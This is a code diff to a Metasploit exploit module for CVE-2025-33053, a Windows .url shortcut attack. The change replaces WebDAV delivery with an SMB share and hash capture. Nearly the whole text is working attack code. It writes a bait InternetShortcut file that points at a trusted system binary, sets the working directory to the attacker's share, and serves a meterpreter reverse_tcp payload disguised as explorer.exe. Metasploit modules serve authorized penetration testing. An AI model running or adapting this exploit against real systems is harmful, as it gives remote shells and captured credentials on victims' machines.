Adds SMB server to send payload

Author: msutovsky-r7

modules/exploits/windows/fileformat/cve_2025_33053.rb

@@ -6,8 +6,10 @@
 class MetasploitModule < Msf::Exploit::Remote
   Rank = NormalRanking
 
-  include Msf::Exploit::Remote::HttpServer
+  include Msf::Exploit::Remote::SMB::Server::Share
+  include Msf::Exploit::Remote::SMB::Server::HashCapture
   include Msf::Exploit::FILEFORMAT
+  include Msf::Exploit::EXE
 
   def initialize(info = {})
     super(
@@ -34,94 +36,69 @@ def initialize(info = {})
           ['URL', 'https://github.com/DevBuiHieu/CVE-2025-33053-Proof-Of-Concept']
         ],
         'Platform' => 'win',
-        'Arch' => ARCH_X64,
+        'Arch' => [ARCH_X64, ARCH_X86, ARCH_AARCH64],
+        'Passive' => true,
         'Targets' => [['Windows (generic)', {}]],
+        'DefaultOptions' => {
+          'FOLDER_NAME' => 'webdav',
+          'FILE_NAME' => 'explorer.exe',
+          'DisablePayloadHandler' => false,
+          'Payload' => 'windows/x64/meterpreter/reverse_tcp'
+        },
         'DefaultTarget' => 0,
         'Notes' => {
           'Stability' => [CRASH_SAFE],
-          'SideEffects' => [ARTIFACTS_ON_DISK],
+          'SideEffects' => [IOC_IN_LOGS],
           'Reliability' => [REPEATABLE_SESSION]
         }
       )
     )
 
     register_options(
       [
-        OptString.new('URIPATH', [true, 'The URI to use (do not change)', '/']),
-        OptString.new('OUTFILE', [true, 'Output URL file name', 'bait.url']),
-        OptString.new('PAYLOAD_NAME', [true, 'Output payload file name', 'route.exe']),
-        OptString.new('PAYLOAD', [true, 'Payload to generate', 'windows/x64/meterpreter/reverse_tcp']),
-        OptBool.new('GEN_PAYLOAD', [true, 'Generate payload and move to WebDAV directory', true]),
-        OptString.new('WEBDAV_DIR', [true, 'WebDAV directory path', '/var/www/webdav'])
+        OptString.new('OUTFILE', [false, 'Output URL file name', '']),
       ], self.class
     )
-    register_advanced_options(
-      [
-        OptString.new('LOLBAS_EXE',
-                      [true, 'Path to trusted binary (LOLBAS)', 'C:\\Program Files\\Internet Explorer\\iediagcmd.exe']),
-        OptString.new('ICON_PATH',
-                      [true, 'Icon file path', 'C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe']),
-        OptInt.new('ICON_INDEX', [true, 'Icon index in icon file', 13]),
-        OptString.new('MODIFIED_HEX', [true, 'Modified timestamp in hex', '20F06BA06D07BD014D'])
-      ]
-    )
   end
 
-  def on_request_uri(cli, request)
-    print_status('Got request')
-    case request.method
-    when 'OPTIONS'
-      print_status('[+] Got OPTIONS request')
-      process_options(cli, request)
-    when 'PROPFIND'
-      print_status('[+] Got PROPFIND request')
-      process_propfind(cli, request)
-    when 'GET'
-      print_status('[+] Got GET request')
-      process_get(cli, request)
-    else
-      process_ignore(cli, request)
-    end
+  def exploit_remote_load
+    start_service
+    print_status('The SMB service has been started.')
+
+    self.file_contents = generate_payload_exe
   end
 
-  def primer
-    webdav = '\\\\'
-    if datastore['SSL']
-      if datastore['SRVPORT'] != 443
-        fail_with(Failure::BadConfig, 'SRVPORT must be 443')
-      end
-      webdav = "#{datastore['SRVHOST']}@ssl"
-    else
-      webdav = "#{datastore['SRVHOST']}@#{datastore['SRVPORT']}"
+  def exploit
+    write_url_file
+    exploit_remote_load
+
+    stime = Time.now.to_f
+    timeout = datastore['ListenerTimeout'].to_i
+    loop do
+      break if timeout > 0 && (stime + timeout < Time.now.to_f)
+
+      Rex::ThreadSafe.sleep(1)
     end
-    webdav_unc = %(#{webdav}\\webdav\\)
-    print_status("[+] WebDAV running at #{webdav_unc}")
-    write_url_file(webdav_unc)
   end
 
-  def write_url_file(webdav_unc)
-    content = generate_url_content(webdav_unc)
+  def write_url_file
+    content = generate_url_content
     outfile = %(#{Rex::Text.rand_text_alphanumeric(8)}.url)
     path = store_local('webdav.url', nil, content, outfile)
-    print_status("[+] URL file: #{path}, deliver to target's machine")
-    print_status("[+] Run following: curl http://#{datastore['SRVHOST']}:8080/#{outfile} -o #{outfile}")
+    print_status("URL file: #{path}, deliver to target's machine and wait for shell")
+    # debug stuff
+    # print_status("Run following: curl http://#{datastore['LHOST']}:8080/#{outfile} -o #{outfile}")
   end
 
-  def generate_url_content(webdav_unc)
+  def generate_url_content
     <<~URLFILE
       [InternetShortcut]
-      URL=#{datastore['LOLBAS_EXE']}
-      WorkingDirectory=#{webdav_unc}
+      URL=C:\\Windows\\System32\\CustomShellHost.exe
+      WorkingDirectory=\\\\#{srvhost}\\#{share}\\#{folder_name}\\
       ShowCommand=7
-      IconIndex=#{datastore['ICON_INDEX']}
-      IconFile=#{datastore['ICON_PATH']}
-      Modified=#{datastore['MODIFIED_HEX']}
+      IconIndex=13
+      IconFile=C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe
+      Modified=20F06BA06D07BD014D
     URLFILE
   end
-
-  def return_error(currentpath)
-    fail_with(Failure::NoAccess,
-              "Cannot write to #{currentpath}. Permission denied.\n" \
-              'Try restarting Metasploit with root privilege.')
-  end
 end